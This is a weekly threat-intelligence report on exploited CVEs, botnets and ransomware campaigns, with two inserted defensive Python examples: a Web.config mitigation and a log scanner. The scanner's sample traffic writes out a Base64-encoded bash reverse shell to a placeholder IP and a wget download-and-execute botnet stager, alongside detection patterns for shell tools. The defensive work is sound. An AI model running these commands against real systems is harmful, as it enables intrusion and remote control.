Executive Summary
The week saw a surge in cyber threat activity, with CISA adding six new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including two Microsoft Windows zero-days and one each affecting Adobe, IGEL, Rapid7, and SKYSEA.
Active exploitation was also observed in ICTBroadcast, Gladinet CentreStack, Triofox, and Oracle E-Business Suite, where attackers leveraged unauthenticated remote code execution and data access flaws.
Botnet operations escalated worldwide, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP applications. IoT-focused botnets such as Mirai, Bashlite, Tsunami, and BrickerBot intensified targeting of Eir D1000 routers to recruit devices, maintain persistence, and pivot into the networks behind them.
In malware and targeted threat activity, Cisco Talos reported that threat actor Storm-2603 is exploiting outdated Velociraptor builds to deploy multi-ransomware attacks involving Warlock, LockBit, and Babuk against VMware ESXi and Windows servers. Meanwhile, Trend Micro identified the RondoDox botnet exploiting TP-Link router flaws, and SecureWorks linked the SKYSEA Client View vulnerability to the Bronze Butler (Tick) espionage group targeting Japanese organizations.
Key points
- 6 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
- 3 additional vulnerabilities were confirmed as actively exploited in the wild during the week.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- 3 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-2611
An Improper Input Validation vulnerability in ICTBroadcast affects versions 7.4 and below, allowing unauthenticated remote code execution through command injection in the BROADCAST cookie. According to VulnCheck, this flaw is actively exploited in the wild, with attacks observed in two phases: a time-based check that confirms the injection executes, followed by deployment of a reverse shell using Base64-encoded payloads. Around 200 internet-facing instances remain exposed, and overlaps with activity previously documented by Fortinet suggest possible tool reuse. The patch status for this vulnerability remains undisclosed; VulnCheck has released Snort and Suricata signatures to aid detection.
CVE-2025-6264
An Incorrect Default Permissions vulnerability in Rapid7 Velociraptor, an open-source DFIR and endpoint monitoring tool, affects versions prior to 0.74.3 and can lead to arbitrary command execution and full endpoint takeover. According to Rapid7, insufficient permission checks in the Admin.Client.UpdateClientConfig artifact allow users with the COLLECT_CLIENT privilege to update client configurations and execute arbitrary commands. Cisco Talos observed threat actors deploying outdated Velociraptor builds (notably 0.73.4.0) in ransomware operations delivering Warlock, LockBit, and Babuk payloads, using the tool for persistence, privilege escalation, and stealthy data exfiltration. The flaw was patched in version 0.74.3; Rapid7 recommends upgrading immediately and restricting artifact permissions to mitigate abuse. It has also been added to the CISA KEV catalog.
CVE-2025-11371
A Local File Inclusion vulnerability in Gladinet CentreStack and Triofox up to version 16.7.10368.56560 allows unauthorized disclosure of files on the server. According to Huntress, attackers are exploiting this flaw to read sensitive files such as Web.config and extract the ASP.NET machine key, then chaining it with an earlier ViewState deserialization bug (CVE-2025-30406) to achieve remote code execution. Exploitation has already been observed in multiple environments; since no official patch is available, Huntress recommends disabling the “temp” handler in the UploadDownloadProxy component's Web.config as a temporary mitigation.
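The interim mitigation above amounts to editing an IIS Web.config. The following is an added example (not Huntress's or Gladinet's code) that removes the “temp” handler registration from a constructed Web.config and reports whether the file carries a static machine key, since a key already read through the LFI stays valid after the handler is gone. Handler names and types in the sample are assumptions; only the standard IIS `<system.webServer><handlers><add/>` schema is relied on.

```python
"""Added example: remove the 'temp' handler from an IIS Web.config and flag a static
machineKey. The sample Web.config below is constructed; real handler names/types are
assumed, only the standard <system.webServer>/<handlers>/<add> layout is relied on."""
import xml.etree.ElementTree as ET

HANDLERS_XPATH = "system.webServer/handlers"

# Constructed stand-in for the UploadDownloadProxy Web.config (values are not real).
SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF" decryptionKey="FEDCBA9876543210"
                validation="SHA1" decryption="AES" />
  </system.web>
  <system.webServer>
    <handlers>
      <add name="temp" path="temp" verb="*" type="Example.TempHandler" />
      <add name="upload" path="upload" verb="*" type="Example.UploadHandler" />
    </handlers>
  </system.webServer>
</configuration>
"""


def temp_handlers(root):
    """Return the <add> handler elements whose path or name is 'temp' (case-insensitive)."""
    handlers = root.find(HANDLERS_XPATH)
    if handlers is None:
        return []
    return [h for h in handlers.findall("add")
            if h.get("path", "").lower() == "temp" or h.get("name", "").lower() == "temp"]


def has_temp_handler(config_xml):
    return bool(temp_handlers(ET.fromstring(config_xml)))


def remove_temp_handler(config_xml):
    """Return (patched_xml, number_removed). ElementTree drops XML comments and the
    declaration on output, so back the original file up before overwriting it."""
    root = ET.fromstring(config_xml)
    handlers = root.find(HANDLERS_XPATH)
    victims = temp_handlers(root)
    for h in victims:
        handlers.remove(h)
    return ET.tostring(root, encoding="unicode"), len(victims)


def has_static_machine_key(config_xml):
    """True when validationKey/decryptionKey are fixed values in the file. These are what
    the LFI leaks; removing the handler does not invalidate a key that was already stolen."""
    mk = ET.fromstring(config_xml).find("system.web/machineKey")
    if mk is None:
        return False
    return all(not mk.get(attr, "AutoGenerate").startswith("AutoGenerate")
               for attr in ("validationKey", "decryptionKey"))


if __name__ == "__main__":
    patched, removed = remove_temp_handler(SAMPLE_WEB_CONFIG)
    print(f"removed {removed} handler(s); temp handler still present: {has_temp_handler(patched)}")
    if has_static_machine_key(SAMPLE_WEB_CONFIG):
        print("static machineKey present: rotate it if compromise is suspected")
    print(patched)
```

Run it against a copy of the real file, diff the output against the original, and only then replace it; if the server was exposed before the handler was removed, treat the machine key as leaked and rotate it.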
CVE-2025-24990
An Untrusted Pointer Dereference vulnerability in Microsoft Windows allows local privilege escalation and was remediated in Microsoft's October 2025 Patch Tuesday updates. The flaw exists in the legacy Agere Modem Driver, a component that enables communication with Agere/LSI dial-up and fax modems; rather than fixing it, Microsoft removed the driver in the cumulative update, so fax-modem hardware that depends on it stops working after patching. The issue affects all supported Windows versions and can be exploited even when no modem is in use, so administrators should apply the cumulative update immediately and verify that the Agere driver is no longer present on affected hosts. This vulnerability was actively exploited as a zero-day and has been added to the CISA KEV catalog.
A Use-of-Key-Past-Expiration vulnerability in IGEL OS (versions prior to v11) allows a Secure Boot bypass because the igel-flash-driver fails to validate the cryptographic signature of a SquashFS root filesystem. An attacker can mount a crafted SquashFS image, boot a signed Shim, load a vulnerable kernel, and replace the running kernel via kexec_load, breaking the chain of trust. Successful exploitation enables stealthy bootkits or kernel-level rootkits, leading to code execution, privilege escalation, denial of service, and data exposure. IGEL published a security notice in June 2025 and Microsoft issued a related fix in the October 2025 Patch Tuesday updates; defenders should apply vendor updates, restrict physical and local admin access, and validate firmware and boot configurations. This issue has been added to the CISA KEV catalog.
CVE-2025-54253
A Code Execution vulnerability in Adobe Experience Manager Forms on JEE, affecting 6.5.23 and earlier, allows unauthenticated arbitrary code execution without user interaction; its CVSS scope is Changed, meaning the impact extends beyond the vulnerable component. Adobe released a fix in 6.5.0-0108. A public proof-of-concept is available and the flaw has been added to the CISA KEV catalog, so affected deployments should apply the patch immediately and audit for signs of compromise.
CVE-2025-59230
An Improper Access Control vulnerability in the Microsoft Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally to SYSTEM. The flaw, which affects the Windows service responsible for managing VPN and remote-access connections, arises from improper validation of user-supplied commands, enabling privilege escalation through crafted inputs. Microsoft addressed the issue in its October 2025 Patch Tuesday updates by correcting the access-control checks. While exploitation requires some preparatory effort, the attack is considered relatively easy to execute even for moderately skilled threat actors. This vulnerability was actively exploited as a zero-day and has been added to the CISA KEV catalog.
CVE-2025-61884
A pre-authentication Server-Side Request Forgery vulnerability in the Oracle E-Business Suite Configurator component, affecting 12.2.3 through 12.2.14, permits an unauthenticated attacker with HTTP access to retrieve or manipulate sensitive configuration data. Oracle issued an emergency patch that validates the return_url parameter against a strict regular expression, blocking injected CRLF sequences. A public proof-of-concept was leaked by the ShinyHunters extortion group, increasing exploitation risk. Immediate application of the Oracle update and review of exposed EBS instances are strongly advised.
CVE-2016-7836
An Improper Authentication vulnerability in SKYSEA Client View affecting versions 11.221.03 and earlier permits unauthenticated remote code execution against the management console TCP interface. SecureWorks and vendor advisories document active exploitation beginning in 2016-2017 and link the flaw to espionage campaigns targeting Japanese organizations, attributed to threat actors tracked as BRONZE BUTLER/Tick. SKYSEA remediated the issue in version 11.300.08h, and the vulnerability was later added to the CISA KEV catalog.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.
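Two of the patterns this report describes lend themselves to a log-side check: the ICTBroadcast BROADCAST-cookie injection (the time-based probe followed by a Base64-wrapped reverse shell) and the generic botnet stager that fetches a binary with wget from a raw IP address. The following is an added example, not from the report or from VulnCheck's signatures: a heuristic scanner over constructed access-log lines. The log layout (combined format with the Cookie header as a trailing quoted field), the addresses and the payloads are all constructed for the example.

```python
"""Added example (not from the report): heuristic detection over constructed web-server
access-log lines for (a) CVE-2025-2611-style command injection in the ICTBroadcast
BROADCAST cookie, both the time-based probe and the Base64-wrapped reverse shell, and
(b) generic botnet download-and-execute stagers (wget/curl/tftp from a bare IPv4).
Log format, addresses and payloads are constructed; they are not captured traffic."""
import base64
import re
from dataclasses import dataclass
from urllib.parse import quote, unquote, unquote_plus

# Shell syntax that has no business in an opaque session cookie. 'sleep' covers the
# time-based first phase; '/dev/tcp', 'bash' and redirection cover the reverse shell.
SHELL_META = re.compile(r"[;&|`]|\$\(|/bin/|/dev/tcp|\bbash\b|\bsleep\b")
# wget/curl/tftp fetching from a raw IPv4 address: the classic botnet stager.
DOWNLOADER = re.compile(
    r"\b(?:wget|curl|tftp)\b[^;&|]*?(?:https?://|ftp://|\s)(\d{1,3}(?:\.\d{1,3}){3})")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Combined log format with the Cookie header appended as the last quoted field (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$')


@dataclass
class Finding:
    src_ip: str
    rule: str
    evidence: str


def decode_b64_candidates(text):
    """Yield printable UTF-8 strings hidden in Base64 blobs inside text."""
    for tok in B64_TOKEN.findall(text):
        try:
            dec = base64.b64decode(tok + "=" * (-len(tok) % 4)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if dec.isprintable():
            yield dec


def analyze_line(line):
    m = LOG_RE.match(line)
    if not m:
        return []
    src = m["ip"]
    path = unquote_plus(m["path"])
    cookie = unquote(m["cookie"])   # plain unquote: '+' is a Base64 character here
    findings = []
    # (a) Everything after 'BROADCAST=' is the value: an injected payload may itself
    # contain ';', so a normal cookie-pair split would truncate the evidence.
    value = cookie.partition("BROADCAST=")[2]
    if value:
        if SHELL_META.search(value):
            findings.append(Finding(src, "ictbroadcast-cookie-injection", value))
        for dec in decode_b64_candidates(value):
            if SHELL_META.search(dec):
                findings.append(Finding(src, "ictbroadcast-cookie-b64-shell", dec))
    # (b) Stager fetching a binary from a raw IP, in the request line or the cookie.
    for field in (path, cookie):
        d = DOWNLOADER.search(field)
        if d:
            findings.append(Finding(src, "botnet-downloader", d.group(0)))
    return findings


def scan(lines):
    return [f for line in lines for f in analyze_line(line)]


# Constructed sample traffic (RFC 5737 documentation addresses).
_REVERSE_SHELL_B64 = base64.b64encode(b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1").decode()
SAMPLE_LOGS = [
    # benign opaque session cookie
    '198.51.100.7 - - [10/Oct/2025:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0" "BROADCAST=a1b2c3d4e5f6"',
    # phase 1: time-based probe
    '203.0.113.44 - - [10/Oct/2025:10:00:05 +0000] "GET /login HTTP/1.1" 200 512 '
    '"-" "python-requests/2.31" "BROADCAST=' + quote("x;sleep 5;", safe="") + '"',
    # phase 2: Base64-wrapped reverse shell
    '203.0.113.44 - - [10/Oct/2025:10:00:11 +0000] "GET /login HTTP/1.1" 200 512 '
    '"-" "python-requests/2.31" "BROADCAST='
    + quote(f"x;echo {_REVERSE_SHELL_B64}|base64 -d|sh", safe="") + '"',
    # generic botnet stager in the query string
    '192.0.2.9 - - [10/Oct/2025:10:01:00 +0000] "GET /cgi?cmd=cd+/tmp;wget+http://203.0.113.9/bins/x86;chmod+777+x86;./x86 HTTP/1.1" 404 0 '
    '"-" "Hello, world" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.src_ip:15} {f.rule:32} {f.evidence}")
```

The Base64 pass is what turns a one-off alert into a usable indicator: decoding the blob exposes the callback address in the reverse-shell command, which can then be blocked or hunted for across other hosts. The heuristics are deliberately broad; tune `SHELL_META` against a sample of your own legitimate cookie values before running this at volume.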
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
Malware section
CVE-2025-6264
According to Cisco Talos, threat actor Storm-2603 leverages outdated Velociraptor builds to maintain persistent access and orchestrate multi-ransomware campaigns deploying Warlock, LockBit, and Babuk against VMware ESXi hosts and Windows servers. Indicators include installation of Velociraptor on multiple servers, execution of SMB-based remote commands, creation of admin accounts synced to Entra ID, modification of Group Policy Objects, and execution of fileless PowerShell encryptors. The actor also uses Velociraptor to run developer tools like Visual Studio Code to establish tunnels to attacker-controlled C2 infrastructure and exfiltrate data while evading detection. Talos assesses the campaign aligns with Storm-2603 TTPs and urges patching, artifact permission hardening, and forensic review of Velociraptor deployments.
CVE-2023-1389
Trend Micro's recent analysis of the RondoDox botnet campaign identified its use of known router flaws for initial access, including exploitation of a TP-Link Archer vulnerability, CVE-2023-1389. RondoDox operates as an “exploit shotgun,” chaining longstanding command-injection bugs across routers, DVRs, NVRs and CCTV devices to obtain shell access and deploy multi-architecture payloads. FortiGuard Labs' initial investigation noted early waves targeting TBK DVRs and Four-Faith routers via vulnerabilities such as CVE-2024-3721 and CVE-2024-12856, illustrating the campaign's breadth and opportunistic approach.
CVE-2016-7836
According to SecureWorks, the SKYSEA Client View vulnerability has been linked to espionage campaigns targeting Japanese organizations, with investigations attributing these attacks to the threat actor group Bronze Butler, also known as Tick. This cyber-espionage group primarily focuses on Japanese government, defense, and industrial sectors, conducting persistent, intelligence-driven operations. Bronze Butler leverages custom malware, credential theft, and lateral movement techniques to gain access, exfiltrate sensitive data, and maintain long-term presence within compromised networks.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
The escalation in multi-vector exploits and malware campaigns this week reflects how quickly attackers adapt to newly disclosed flaws and misconfigurations. From botnets exploiting IoT routers to advanced threat actors targeting enterprise platforms, the pace of exploitation continues to accelerate. Strengthening patch management, tightening access controls, and leveraging real-time vulnerability intelligence are key to staying resilient. Loginsoft Vulnerability Intelligence (LOVI) empowers defenders with the visibility and context needed to anticipate threats before they escalate.